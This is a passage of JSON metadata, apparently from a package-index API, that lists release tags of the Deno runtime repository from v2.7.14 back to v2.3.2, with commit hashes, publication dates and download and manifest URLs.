rl":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/